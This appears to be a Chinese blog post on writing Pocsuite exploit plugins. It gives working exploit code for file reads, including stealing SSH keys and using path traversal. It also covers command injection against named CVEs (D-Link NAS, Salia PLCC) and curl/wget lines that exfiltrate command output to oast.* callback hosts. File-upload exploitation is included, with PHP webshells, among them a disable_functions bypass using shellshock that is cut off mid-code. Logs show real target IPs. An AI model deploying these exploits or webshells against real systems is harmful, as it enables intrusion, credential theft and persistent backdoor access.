Skip to content

Pocsuite 插件编写

date
2025-03-15 21:23:28

插件信息

漏洞名称:漏洞编号 产品厂商 产品名称 漏洞特征( 端点... )漏洞类型

例:CVE-2024-51567 CyberPanel upgrademysqlstatus 命令执行漏洞

文件读取

漏洞检测

读取特征然后尝试使用正则去匹配:

def check(self) -> bool:
    """
    Confirm the file-read condition and record the remote OS family.

    A well-known file is requested for each platform through
    ``self.read_file`` and is accepted only when its content has the expected
    structure, so an arbitrary non-empty response is not counted as a hit.

    :return: True when a passwd-style record is found (``self.system_type``
        is set to ``'linux'``) or when the win.ini section markers are found
        (``self.system_type`` is set to ``'windows'``); False otherwise,
        including when ``read_file`` raises.
    """
    try:
        content = self.read_file("/etc/passwd")
        # One passwd record: seven colon-separated fields with numeric uid/gid.
        pattern = r'^\w+:[^\n]*:[0-9]+:[0-9]+:[^\n]*:[^\n]*:[^\n]*$'
        if re.search(pattern, content, re.MULTILINE):
            self.system_type = 'linux'
            return True
        # Lower-case once instead of once per marker.
        content = self.read_file("C:\\Windows\\win.ini").lower()
        if all(marker in content for marker in ('[fonts]', '[extensions]', '[files]')):
            self.system_type = 'windows'
            return True
    except Exception:
        # Best-effort probe: any failure just means "not confirmed".
        pass
    return False

read_file 要检测一下是不是蜜罐,所以当文件内容包含在 HTML 里面时,需要先提取出完整、准确的文件内容,而不是直接返回 res.text。

@lru_cache(maxsize=None)
def read_file(self, file_name):
    """
    Template for the file-read request; results are memoized by ``lru_cache``.

    The exact file content must be returned rather than the raw response,
    because a decoy service may answer every request with an HTML page.
    Responses that are not HTTP 200, that contain an HTML doctype or closing
    ``</html>`` tag, or that contain 'no such file' are therefore rejected.

    NOTE: the request path, headers and body are left blank here and
    ``file_name`` is not yet placed into the request.

    :param file_name: path of the file to read
    :return: response text without trailing newlines, or '' on rejection/error
    """
    try:
        # Possible normalisation for Windows paths, kept disabled:
        # if '\\' in file_name:
        #     file_name = file_name.replace('C:', '')
        #     file_name = file_name.replace('\\', '/')
        target = self.url.rstrip('/') + ''
        request_headers = {}
        payload = """"""
        res = requests.post(target, headers=request_headers, data=payload, verify=False)
        if res.status_code != 200:
            return ''
        lowered = res.text.lower()
        rejected_markers = ('<!DOCTYPE html'.lower(), "</html>", 'No such file'.lower())
        if any(marker in lowered for marker in rejected_markers):
            return ''
        file_content = res.text.rstrip('\n')
        logger.info("{} => {} => {}".format(self.url, file_name, file_content))
        return file_content
    except Exception:
        # Best-effort: fall through to the empty result.
        pass
    return ''

漏洞利用

如果可以读取 .ssh 下面的密钥,可以实现远程登陆,还是比较有用的。

https://www.runoob.com/w3cnote/set-ssh-login-key.html

1
2
3
4
5
6
7
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
try:
    lines = self.passwd.splitlines()
    for line in lines:
        # 可以远程登陆的还有 zsh 之类的
        if '/bin/bash' not in line and '/bin/sh' not in line:
            continue
        home_directory = line.split(':')[5]
        if home_directory == "/":
            continue
        # 文件读取
        for file_name in ['authorized_keys', 'id_rsa', 'id_rsa.pub', 'known_hosts']:
            path = home_directory + '/.ssh/' + file_name
            content = self.read_file(path)
            if content:
                info.append({"name": path, "path": path, "result": content})
except Exception as e:
    pass

SonicWALL Apache HTTP 任意文件读取漏洞可以读取 sqlite3 格式的配置文件,但是发现原生字符串直接存储到系统中导致无法还原。

所以需要存储为 base64

@lru_cache(maxsize=None)
def read_file(self, file_name):
    """
    Read a remote file; results are memoized by ``lru_cache``.

    ``.db`` files are returned base64-encoded so the raw bytes survive being
    stored as text. Every other file is returned as UTF-8 text.

    :param file_name: path of the file to request (appended to the base URL)
    :return: file content (base64 text for ``.db`` files), or '' when the
        body looks like an HTML page or any step fails
    """
    try:
        url = self.url.rstrip('/') + f'{file_name}%3f.1.1.1.1a-1.css'
        res = requests.get(url, verify=False, timeout=60, stream=True)
        buffer = BytesIO()
        for chunk in res.iter_content(8192):
            if chunk:
                buffer.write(chunk)
        raw = buffer.getvalue()
        # Inspect the bytes directly: decoding a binary body to text just to
        # look for HTML markers is wasteful and depends on charset guessing.
        lowered = raw.lower()
        if b'<!doctype html' in lowered or b'<html' in lowered:
            return ''
        if file_name.endswith('.db'):
            result = base64.b64encode(raw).decode('utf-8')
        else:
            result = raw.decode('utf-8')
        logger.info("{} => {} => {}".format(self.url, file_name, result))
        return result
    except Exception:
        # Best-effort: network and decoding errors yield the empty result.
        pass
    return ''

特殊情况

响应内容为:

HTTP/1.1 200 OK
Server: cmon/2.1.0.9571
Connection: close
Content-Length: 1856

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
xxxx.......
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:112:119:MySQL Server,,,:/nonexistent:/bin/false
prometheus:x:1001:1001::/home/prometheus:/bin/false
HTTP/1.1 200 OK
Server: cmon/2.1.0.9571
Connection: close
Content-Length: 63
Cache-Control: no-cache,must-revalidate,max-age=0
Pragma: no-cache
Set-Cookie: cmon-sid=ca1d569a93e941ca882cb79bbb82bfbb; expires=Fri, 02 Aug 2024 17:44:49 +0000, path=/, domain=164.90.154.246
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: content-type
Access-Control-Allow-Methods: POST, GET, OPTIONS, HEAD
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 86400
Content-Type: application/json

{
    "controller_id": "2f864ad8-ac59-4aed-ad52-0b1b6bdd1c53"
}

只能使用 socket 去提取:

def read_file(self, filename):
    """
    Read a file over a raw TCP socket and cut the content out of the reply.

    The raw reply is split on blank lines. The second section is accepted only
    if it contains a further 'HTTP/1.1 200 OK' status line, and the text in
    front of that status line is returned as the file content.

    :param filename: absolute path appended to the traversal prefix
    :return: extracted file content, or '' when the reply has an unexpected
        shape or any step fails
    """
    status_line = 'HTTP/1.1 200 OK'
    try:
        raw_request = ''.join((
            'GET /../../../../../../../../..{} HTTP/1.1\r\n'.format(filename),
            'Host: {}:{}\r\n'.format(self.host, self.port),
            'Accept-Encoding: deflate\r\n\r\n',
        ))
        chunks = []
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as conn:
            conn.connect((self.host, self.port))
            conn.sendall(raw_request.encode('utf-8'))
            # Read until the peer closes the connection.
            for part in iter(lambda: conn.recv(4096), b''):
                chunks.append(part)
        data = b''.join(chunks).decode('utf-8')
        if not data:
            return ''
        sections = data.split('\r\n\r\n')
        if len(sections) < 2 or status_line not in sections[1]:
            return ''
        file_content = sections[1].split(status_line)[0]
        logger.info("{} => {} => {}".format(self.url, filename, file_content))
        return file_content
    except Exception:
        # Best-effort: fall through to the empty result.
        pass
    return ''

命令执行

有回显

有回显检测比较简单,输出随机的字符串即可,但是在 exec 中需要谨慎对待,因为很多会返回 xxx command not found,所以还是需要特殊情况特殊对待,写完后跑一遍,找找特殊情况。

1
2
3
4
5
6
7
8
def check(self):
    """
    Verify command execution by echoing a random marker.

    :return: True when the 15-character marker appears in the output of
        ``self.exec``; False otherwise or on any error
    """
    try:
        marker = random_str(15)
        output = self.exec(f"echo {marker}")
        return marker in output
    except Exception:
        return False

无回显

无回显分为两种情况:

  • 有写入文件权限
    • 写 webshell
    • 写 web 静态文件
    • 远程下载( sh | bat )
  • 无写入文件权限
    • dnslog 检测
    • 延时检测
    • httplog 外带获取回显

写静态文件

把命令执行的结果直接写入 txt 或者其他类型的文件,然后读取结果再删掉文件。

这个比较常用,因为一些可以写小马的环境比如 PHP、JSP 等可能会出现杀软杀掉。

有特殊情况写的文件需要再加一层赋予权限的操作才能读 chmod 777 file_path ( CVE-2024-3400 )

def exec(self, command):
    """
    Run a command without direct echo by redirecting its output to a file.

    The output is written to a randomly named ``.txt`` file, fetched over
    HTTP, and the file is then removed. Removal happens in a ``finally``
    clause so the file is not left behind when the fetch is rejected or fails.

    NOTE: the directory prefix and the URL path of the file are left blank in
    this template.

    :param command: command line to run
    :return: command output without trailing newlines, or '' on failure
    """
    try:
        # Random file name so concurrent runs do not collide.
        file_name = random_str(6) + '.txt'
        file_path = '' + file_name
        if not self.exec_command(f'{command}>{file_path}'):
            return ''
        try:
            url = self.url.rstrip('/') + '' + file_name
            res = requests.get(url, verify=False, allow_redirects=False)
            if res.status_code != 200 or '<!doctype html' in res.text.lower():
                return ''
            result = res.text.rstrip('\n')
            logger.info("{} => {} => {}".format(self.url, command, result))
            return result
        finally:
            # Delete exactly the one file that was created; a wildcard delete
            # keyed on a random suffix would be too dangerous.
            self.exec_command(f'rm -rf {file_path}')
    except Exception:
        # Best-effort: fall through to the empty result.
        pass
    return ''

def exec_command(self, command) -> bool:
    """
    Template for sending the request that carries the command.

    NOTE: path, headers and body are blank here and ``command`` is not yet
    placed into the request. The response is not inspected.

    :param command: command line to run
    :return: True when the request completed without raising, else False
    """
    try:
        target = self.url.rstrip('/') + ''
        request_headers = {}
        payload = """"""
        requests.get(target, headers=request_headers, data=payload, verify=False)
    except Exception:
        return False
    return True

dnslog

def check_by_dnslog(self):
    """
    Verify command execution through an out-of-band callback.

    One interaction server is picked at random. Each candidate command is run
    through ``self.exec`` and, after a three-second wait, the interaction
    record is checked.

    :return: True as soon as one command produces a recorded interaction;
        False when none does or on any error
    """
    try:
        server = random.choice([
            "oast.pro",
            "oast.live",
            "oast.site",
            "oast.fun",
            "oast.online",
            "oast.me",
        ])
        ish = Interactsh(token=random_str(15), server=server)
        oob_url, flag = ish.build_request()
        oob_host = urlparse(oob_url).hostname
        candidates = (
            f'nslookup {oob_host}',
            f'curl {oob_url}',
            f'wget {oob_url}',
            f'ping -c 5 {oob_host}',
            f'ping {oob_host}',
        )
        for candidate in candidates:
            self.exec(candidate)
            time.sleep(3)
            if ish.verify(flag):
                return True
    except Exception:
        # Best-effort: treat any failure as "not confirmed".
        pass
    return False

httplog

httplog 适用于那些写不了文件、权限比较低但是又想要回显的情况。

通过 self.ish.poll() 获取 http 协议的请求获取命令执行的结果。

1
2
3
4
5
id | curl -X POST -d @- <url>
curl -X POST -d "$(<command>)" <url>
curl -H "Cookie:$(<command>)" <url>
wget --post-data $(<command>) <url> --spider
wget --header="Cookie:$(<command>)" <url> --spider  #  $(cat /etc/passwd | xargs echo–n) 去掉换行字符

ish 响应:

[
    {
        "protocol": "dns",
        "unique-id": "p8l7gj70u3h04k44p06l2ho66367tsfug",
        "full-id": "mhpjekynti.p8l7gj70u3h04k44p06l2ho66367tsfug",
        "q-type": "AAAA",
        "raw-request": ";; opcode: QUERY, status: NOERROR, id: 31705\n;; flags:; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags: do; udp: 1232\n\n;; QUESTION SECTION:\n;mhpjekynti.p8l7gj70u3h04k44p06l2ho66367tsfug.oast.site.\tIN\t AAAA\n",
        "raw-response": ";; opcode: QUERY, status: NOERROR, id: 31705\n;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2\n\n;; QUESTION SECTION:\n;mhpjekynti.p8l7gj70u3h04k44p06l2ho66367tsfug.oast.site.\tIN\t AAAA\n\n;; ANSWER SECTION:\nmhpjekynti.p8l7gj70u3h04k44p06l2ho66367tsfug.oast.site.\t3600\tIN\tA\t178.128.16.97\n\n;; AUTHORITY SECTION:\nmhpjekynti.p8l7gj70u3h04k44p06l2ho66367tsfug.oast.site.\t3600\tIN\tNS\tns1.oast.site.\nmhpjekynti.p8l7gj70u3h04k44p06l2ho66367tsfug.oast.site.\t3600\tIN\tNS\tns2.oast.site.\n\n;; ADDITIONAL SECTION:\nns1.oast.site.\t3600\tIN\tA\t178.128.16.97\nns2.oast.site.\t3600\tIN\tA\t178.128.16.97\n",
        "remote-address": "195.3.101.254",
        "timestamp": "2024-10-16T08:22:55.351498427Z"
    },
    {
        "protocol": "http",
        "unique-id": "p8l7gj70u3h04k44p06l2ho66367tsfug",
        "full-id": "mhpjekynti.p8l7gj70u3h04k44p06l2ho66367tsfug",
        "raw-request": "POST /uname%20-a HTTP/1.1\r\nHost: mhpjekynti.p8l7gj70u3h04k44p06l2ho66367tsfug.oast.site\r\nAccept: */*\r\nContent-Length: 99\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: curl/7.82.0\r\n\r\nLinux salia 4.9.11-chargebyte+g87f8fccf0251 #1 PREEMPT Wed Jun 8 04:39:25 UTC 2022 armv7l GNU/Linux",
        "raw-response": "HTTP/1.1 200 OK\r\nConnection: close\r\nAccess-Control-Allow-Credentials: true\r\nAccess-Control-Allow-Headers: Content-Type, Authorization\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nServer: oast.site\r\nX-Interactsh-Version: 1.2.2\r\n\r\n<html><head></head><body>gufst76366oh2l60p44k40h3u07jg7l8p</body></html>",
        "remote-address": "176.66.69.141",
        "timestamp": "2024-10-16T08:22:55.740501009Z"
    }
]

封装为对应的函数如下:

def get_command_name_from_raw_request(raw_request) -> str:
    """
    Extract the command name carried in the request target of a raw request.

    The second space-separated token of the request is taken, its leading
    slashes are removed, and it is percent-decoded.

    :param raw_request: raw HTTP request text
    :return: decoded command name, or '' when it is empty or cannot be parsed
    """
    try:
        request_target = raw_request.split(' ')[1]
        decoded = unquote(request_target.lstrip('/'))
    except Exception:
        return ''
    # Other transports (hex-encoded path, a dedicated header) are not handled.
    return decoded or ''


def get_command_result_from_raw_request(raw_request) -> str:
    """
    Extract the command result (the POST body) from a raw HTTP request.

    The body is everything after the first blank line. Splitting only once
    keeps blank lines inside the body intact, and a request without a header
    terminator yields '' instead of its own header text.

    :param raw_request: raw HTTP request text
    :return: request body, or '' when there is none or the input is invalid
    """
    try:
        _, separator, body = raw_request.partition('\r\n\r\n')
    except (AttributeError, TypeError):
        # Not a string (e.g. None when the record has no raw request).
        return ''
    return body if separator else ''

def get_command_info_from_httplog(ish: "Interactsh") -> list:
    """
    Collect command name/result pairs from the polled interaction records.

    Only records whose protocol is 'http' are considered. A record is kept
    when both a command name and a result can be extracted from its raw
    request.

    :param ish: interaction client exposing ``poll()``; the annotation is a
        string so it is not evaluated when the function is defined
    :return: list of ``{'name': ..., 'result': ...}`` dicts; whatever was
        collected so far is returned if polling or parsing raises
    """
    info = []
    try:
        for item in ish.poll():
            if item.get('protocol') != 'http':
                continue
            raw_request = item.get('raw-request')
            name = get_command_name_from_raw_request(raw_request)
            result = get_command_result_from_raw_request(raw_request)
            if name and result:
                entry = {
                    'name': name,
                    'result': result,
                }
                info.append(entry)
                logger.info(entry)
    except Exception:
        # Best-effort: return what has been collected.
        pass
    return info


def init_ish() -> "Interactsh | None":
    """
    Create an interaction client bound to one randomly chosen server.

    The return annotation is a string so it is not evaluated when the
    function is defined, and it states that None is a possible result.

    :return: a new ``Interactsh`` client, or None when construction fails
    """
    try:
        server = random.choice([
            "oast.pro",
            "oast.live",
            "oast.site",
            "oast.fun",
            "oast.online",
            "oast.me",
        ])
        return Interactsh(token=random_str(15), server=server)
    except Exception:
        # Best-effort: the caller receives None.
        pass
    return None

延时检测

对于不出网的情况的漏洞检测。

利用:timeout、sleep、ping 等命令造成延时

有 sleep 的可以类似 sql 注入的延时检测:

  • 延时后的时间 > 延时时间(随机 30 ~ 40 s) > 正常请求

没有的使用 ping:

  • ping 15 次时间 > ping 10 次 > ping 5 次

这类 poc 可以增加一个检测日志,执行的命令,响应所用的秒数,用于人工看的时候可以明显判定非误报。

测试漏洞:CVE-2023-46359 Salia PLCC cPH2 命令执行漏洞

测试情况:

  • 共 58 条 url
  • dnslog 检测结果:7 个
  • sleep 检测结果:随机 30 ~ 40s | 结果:7 个
  • ping 检测结果:分别 ping 30、20、10、1 次 | 结果:6 个
  • 没有误报的

sleep 类型:

image-20241115142727639

ping 类型:

image-20241115143014296

测试日志:

{
    "url": "http://80.90.145.225:202",
    "info": {
        "info": "sleep | ping -c 验证漏洞存在 !",
        "check_log": [
            {
                "command": "sleep 0",
                "elapsed": 2.764704
            },
            {
                "command": "sleep 58",
                "elapsed": 61.271262
            },
            {
                "command": "ping -c 30 127.0.0.1",
                "elapsed": 31.945672
            },
            {
                "command": "ping -c 20 127.0.0.1",
                "elapsed": 22.18187
            },
            {
                "command": "ping -c 10 127.0.0.1",
                "elapsed": 12.321375
            },
            {
                "command": "ping -c 1 127.0.0.1",
                "elapsed": 4.103144
            }
        ]
    },
    "scan_time": "2024-11-15 06:37:27Z",
    "mmh3_hash": "454884881"
}

具体代码:

    def check_by_sleep(self) -> dict:
        """
        Verify command execution through the delay caused by ``sleep``.

        - Linux: sleep 30
        - Windows: timeout /t 30 /nobreak

        A baseline ``sleep 0`` and a ``sleep N`` (N random in 30..40) are timed
        through ``self.exec``. The check passes when the delayed request took
        longer than N seconds and N is longer than the baseline.

        :return: ``{0: baseline_seconds, N: delayed_seconds}`` on success,
            otherwise ``{}`` (also on any error)
        """
        try:
            template = 'sleep {}'
            delay = random.randint(30, 40)
            baseline = self.exec(template.format(0))
            delayed = self.exec(template.format(delay))
            timings = {0: baseline, delay: delayed}
            if delayed > delay and delay > baseline:
                return timings
        except Exception:
            # A failed probe (e.g. None timing) counts as "not confirmed".
            pass
        return {}

    def check_by_ping(self) -> dict:
        """
        Verify command execution through the delay caused by the ping count.

        - Linux: ping -c 30 127.0.0.1
        - Windows: ping -n 30 127.0.0.1

        Pings with 30, 20, 10 and 1 packets are timed through ``self.exec``.
        The check passes only when every larger count took strictly longer
        than the next smaller one, so a single slow response cannot satisfy it.

        :return: ``{count: seconds}`` for all four counts on success,
            otherwise ``{}`` (also on any error)
        """
        try:
            command = 'ping -c {} 127.0.0.1'
            counts = [30, 20, 10, 1]
            result = {count: self.exec(command.format(count)) for count in counts}
            timings = [result[count] for count in counts]
            # Require the full chain: t(30) > t(20) > t(10) > t(1).
            if all(longer > shorter for longer, shorter in zip(timings, timings[1:])):
                return result
        except Exception:
            # A failed probe (e.g. None timing) counts as "not confirmed".
            pass
        return {}

    def check(self):
        """
        Run the sleep-based and ping-based timing checks and collect a log.

        Each timing is recorded as ``{'command': ..., 'elapsed': ...}`` so a
        reviewer can see the delays. A missing or zero timing marks a failed
        request and aborts the whole check. Timings are compared as-is rather
        than truncated to an integer, so a sub-second baseline such as
        ``sleep 0`` is not mistaken for a failure.

        :return: list of log entries; ``[]`` when nothing was verified, a
            probe failed, or an error occurred
        """
        try:
            check_logs = []
            probes = (
                # 1. sleep-based verification
                (self.check_by_sleep, 'sleep {}'),
                # 2. ping-count-based verification
                (self.check_by_ping, 'ping -c {} 127.0.0.1'),
            )
            for probe, template in probes:
                for key, value in probe().items():
                    if not value:
                        return []
                    msg = {
                        'command': template.format(key),
                        'elapsed': value,
                    }
                    logger.info(msg)
                    check_logs.append(msg)
            return check_logs
        except Exception:
            # Best-effort: fall through to the empty result.
            pass
        return []

    def exec(self, command) -> float:
        """
        Run a command and report how long the request took.

        A request counts as successful only when there is an explicit
        indicator: here HTTP 200 plus the text 'SUCCESS' in the response
        (e.g. ``127.0.0.1 && sleep 0 => <b>SUCCESS</b>``).

        :param command: command line appended after ``127.0.0.1 &&``
        :return: elapsed seconds on success, 0 when the response is not a
            success, None when the request raises
        """
        try:
            logger.info('exec command {}'.format(command))
            endpoint = self.url.rstrip('/') + '/connectioncheck.php'
            query = {'ip': f'127.0.0.1 && {command}'}
            res = requests.get(endpoint, params=query, verify=False, timeout=360)
            if res.status_code == 200 and 'SUCCESS' in res.text:
                return res.elapsed.total_seconds()
            return 0
        except Exception:
            return None

    def _verify(self):
        backdoor = self.get_option("backdoor")
        cmd = self.get_option("cmd")
        only_check = self.get_option("check")
        save_result = self.get_option("save")
        result = {}
        self.raw_url = self.url
        self.host = urlparse(self.url).hostname
        self.port = urlparse(self.url).port
        if self.port is None:
            self.port = 443
        if cmd:
            if not hasattr(self, "_cmd"):
                raise NotImplementedError
            result = self._cmd()
        else:
            try:
                check_logs = self.check()
                if not check_logs:
                    return self.parse_output(result)
                result["url"] = self.url
                if only_check:
                    result["result"] = f"存在 {self.name}"
                else:
                    result["info"] = {
                        'info': 'sleep | ping -c 验证漏洞存在 !',
                        'check_log': check_logs
                    }
                if backdoor:
                    if not hasattr(self, "_backdoor"):
                        raise NotImplementedError
                    backdoor_result = self._backdoor()
                    if backdoor_result:
                        result["backdoor"] = backdoor_result
                result["scan_time"] = datetime.datetime.utcnow().strftime("%Y-%m-%d %H:%M:%SZ")
                result["mmh3_hash"] = self.generate_mmh3_hash()
            except Exception as e:
                pass
        if result and save_result:
            self.save(result)
        return self.parse_output(result)

特殊情况

回显到响应头

image-20240726131720186

解决方法:

  1. 构造合法 header
  2. 写到文件后读取

合法 header:

image-20240726131757787

Python 就可以解析:

image-20240726131930082

image-20240726131915685

写入文件:

image-20240726132113923

回显位置响应体或者响应头

CVE-2024-10914 D-Link NAS account_mgr.cgi name 参数命令注入漏洞

image-20241112150726591

image-20241112150809749

所以只能使用 socket 完成 http 请求,然后利用 echo "$(cat+/etc/passwd)" + 正则去提取准确的结果。

image-20241112150950505

def exec_command(self, command) -> str:
    """
    Send the request carrying the command over a raw socket.

    The output may appear in the response headers, so this method only sends
    the request and returns the complete raw response; extracting the exact
    output is left to ``exec``.

    :param command: command text placed into the ``name`` parameter
    :return: raw response decoded as UTF-8, or '' on any error
    """
    try:
        request_lines = (
            "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=';{};' HTTP/1.1\r\n".format(command),
            'Host: {}:{}\r\n'.format(self.host, self.port),
            'User-Agent: Mozilla/5.0 (Android 5.0; Mobile; rv:56.0) Gecko/56.0 Firefox/56.0\r\n',
            'Accept-Encoding: gzip, deflate, br\r\n',
            'Accept: */*\r\n',
            'Connection: close\r\n\r\n',
        )
        raw_request = ''.join(request_lines).encode('utf-8')
        received = []
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as conn:
            conn.connect((self.host, self.port))
            conn.sendall(raw_request)
            # Read until the peer closes the connection.
            for part in iter(lambda: conn.recv(4096), b''):
                received.append(part)
        return b''.join(received).decode('utf-8')
    except Exception:
        # Best-effort: fall through to the empty result.
        pass
    return ''

@lru_cache(maxsize=None)
def exec(self, command) -> str:
    """
    Run a command and extract its output from between explicit markers.

    The command is wrapped so its output is echoed between ``<result>`` tags,
    spaces are replaced with ``+``, and the raw response from
    ``self.exec_command`` is searched for the tagged section. Results are
    memoized by ``lru_cache``.

    :param command: command line to run
    :return: text found between the markers, or '' when nothing is found,
        the wrapper came back unexpanded, or an error occurs
    """
    try:
        command = f'echo "<result>$({command})</result>"'.replace(' ', '+')
        http_response_raw = self.exec_command(command)
        found = re.findall(pattern=r'<result>(.*)</result>', string=http_response_raw, flags=re.DOTALL)
        if not found:
            return ''
        result = found[0]
        # A response that merely reflects the request would still start with
        # the unexpanded '$(' — reject it to avoid a false positive.
        if not result or result.startswith('$('):
            return ''
        logger.info({'url': self.url, 'command': command, 'result': result})
        return result
    except Exception:
        # Best-effort: fall through to the empty result.
        pass
    return ''

中文编码问题

image-20240826124708633

首先尝试解码如 gbk 测试网站:http://www.mytju.com/classcode/tools/messycoderecover.asp

这个不行,换一种思路,通过 powershell 输出 base64 的形态,然后再解码获取正确的中文( 之前遇到一个数据库 postgresql 命令执行会因为编码问题报错,也是这样解决的 )

powershell -Command [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes((cmd /c {command})))

image-20240826125016590

那么对于正常的可以使用 GBK 解码的就可以这样:

def exec(self, command):
    """
    Run a command through ``self.shell_url`` and decode the output as GBK.

    Responses that are not HTTP 200 or that contain an HTML doctype or a
    closing ``</html>`` tag are rejected. The body is decoded as GBK first;
    when that fails, the text decoded by the HTTP client is used instead.

    :param command: command line to run
    :return: output without trailing newlines, or '' on rejection/error
    """
    try:
        res = requests.post(self.shell_url, params={'command': command}, verify=False)
        if res.status_code != 200:
            return ''
        lowered = res.text.lower()
        if '<!DOCTYPE html'.lower() in lowered or "</html>" in lowered:
            return ''
        try:
            # Try GBK first
            result = res.content.decode('gbk')
        except (UnicodeDecodeError, AttributeError):
            result = res.text
        result = result.rstrip('\n')
        logger.info("{} => {} => {}".format(self.url, command, result))
        return result
    except Exception:
        # Best-effort: fall through to the empty result.
        pass
    return ''

系统类型

命令执行需要先判断系统类型( windows | linux ),之前使用的是 whoami 的形式,windows whoami 有一个斜杠,而 linux 没有:

desktop-50utgo8\fuyoumingyan

但是有些漏洞就会出现问题,比如目标上没有 whoami,或者 linux 的 whoami 结果是一个报错、而报错中又包含斜杠,就会导致误判。

更换为了多个命令判断:

windows:

  • echo %OS% => Windows_NT( linux 就会正常的 %OS% )
  • ver => Microsoft Windows [版本 10.0.22631.4037]

linux:

  • uname => Linux

而且多次获取时,可能出现一次能获取到、另一次获取不到的情况。

修改为判断漏洞是否存在后就判断能否获取到操作系统:

image-20240828150253652

image-20240828150315464

文件上传

漏洞检测

最简单准确的做法,通过输出 MD5 或者随机字符串:

def check(self) -> bool:
    """
    Verify the upload by requesting the uploaded file and looking for a
    fixed marker.

    The uploaded file prints md5('123') and removes itself.

    :return: True when the file URL answers HTTP 200 and the body contains
        the expected digest; False otherwise or on any error
    """
    expected_digest = '202cb962ac59075b964b07152d234b70'
    try:
        file_content = "<?php echo md5('123');unlink(__FILE__);?>"
        file_url = self.download_shell(file_content)
        res = requests.get(file_url, verify=False, allow_redirects=False)
        return res.status_code == 200 and expected_digest in res.text
    except Exception:
        return False

PHP:

<?php echo md5('123');unlink(__FILE__);?>

JSP:

<% out.println("202cb962ac59075b964b07152d234b70");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>

漏洞利用

通过 pocsuite3 上传小马进行命令执行

  1. 上传小马
  2. 访问检测是否上传成功
  3. 命令执行
  4. 删除自身( 在上传的小马中写好自删除的逻辑 )
def upload(self, file_content) -> str:
    """
    Template for the upload request.

    NOTE: the upload path, headers, form fields and the resulting file path
    are left blank here.

    :param file_content: content of the file to upload
    :return: URL of the uploaded file when the response is HTTP 200,
        otherwise '' (also on any error)
    """
    try:
        file_name = random_str(6) + '.php'
        target = self.url.rstrip('/') + ''
        request_headers = {}
        form_fields = {}
        multipart = {'file': (file_name, file_content, 'text/plain')}
        res = requests.post(target, headers=request_headers, data=form_fields, files=multipart,
                            verify=False, allow_redirects=False)
        if res.status_code != 200:
            return ''
        file_url = self.url.rstrip('/') + ''
        logger.info('upload success => {}'.format(file_url))
        return file_url
    except Exception:
        # Best-effort: fall through to the empty result.
        pass
    return ''

def delete(self):
    """
    Ask the uploaded file to remove itself and forget its URL.

    Does nothing when ``self.shell_url`` is empty; errors are ignored.
    """
    try:
        if not self.shell_url:
            return
        self.exec('delete')
        logger.info('delete shell => {}'.format(self.shell_url))
        self.shell_url = ''
    except Exception:
        # Best-effort cleanup.
        pass

def check(self):
    """
    Upload the file and confirm it works by echoing a random marker.

    NOTE: the base64 content is left blank in this template.

    :return: True when the 20-character marker appears in the output of
        ``self.exec``; False when the upload fails, the marker is missing,
        or an error occurs
    """
    try:
        shell_content_base64 = ''
        decoded_bytes = base64.b64decode(shell_content_base64.encode('utf-8'))
        self.shell_url = self.upload(decoded_bytes.decode('utf-8'))
        if not self.shell_url:
            return False
        marker = random_str(20)
        return marker in self.exec(f"echo {marker}")
    except Exception:
        return False

常用小马

PHP

普通小马

1
2
3
4
5
6
7
<?php
if (!empty($_REQUEST['command'])) {
    if ($_REQUEST['command'] === 'delete'){
        unlink(__FILE__);
    }
    system($_REQUEST["command"]);
}?>

命令执行函数存在限制的简单绕过小马( 哥斯拉的 )

<?php

function function_existsEx($functionName)
{
    $d = explode(",", @ini_get("disable_functions"));
    if (empty($d)) {
        $d = array();
    } else {
        $d = array_map('trim', array_map('strtolower', $d));
    }
    return (function_exists($functionName) && is_callable($functionName) && !in_array($functionName, $d));
}

function execCommand($cmdLine)
{
    @ob_start();
    if (substr(__FILE__, 0, 1) == "/") {
        @putenv("PATH=" . getenv("PATH") . ":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");
    } else {
        @putenv("PATH=" . getenv("PATH") . ";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");
    }
    $result = "";
    if (!function_existsEx("runshellshock")) {
        function runshellshock($d, $c)
        {
            if (substr($d, 0, 1) == "/" && function_existsEx('putenv') && (function_existsEx('error_log') || function_existsEx('mail'))) {
                if (strstr(readlink("/bin/sh"), "bash") != FALSE) {
                    $tmp = tempnam(sys_get_temp_dir(), 'as');
                    putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");
                    if (function_existsEx('error_log')) {
                        error_log("a", 1);
                    } else {
                        mail("a@127.0.0.1", "", "", "-bv");
                    }
                } else {
                    return False;
                }
                $output = @file_get_contents($tmp);
                @unlink($tmp);
                if ($output != "") {
                    return $output;
                }
            }
            return False;
        }

        ;
    }
    if (function_existsEx('system')) {
        @system($cmdLine);
    } elseif (function_existsEx('passthru')) {
        $result = @passthru($cmdLine);
    } elseif (function_existsEx('shell_exec')) {
        $result = @shell_exec($cmdLine);
    } elseif (function_existsEx('exec')) {
        @exec($cmdLine, $o);
        $result = join("\n", $o);
    } elseif (function_existsEx('popen')) {
        $fp = @popen($cmdLine, 'r');
        while (!@feof($fp)) {
            $result .= @fgets($fp, 1024 * 1024);
        }
        @pclose($fp);
    } elseif (function_existsEx('proc_open')) {
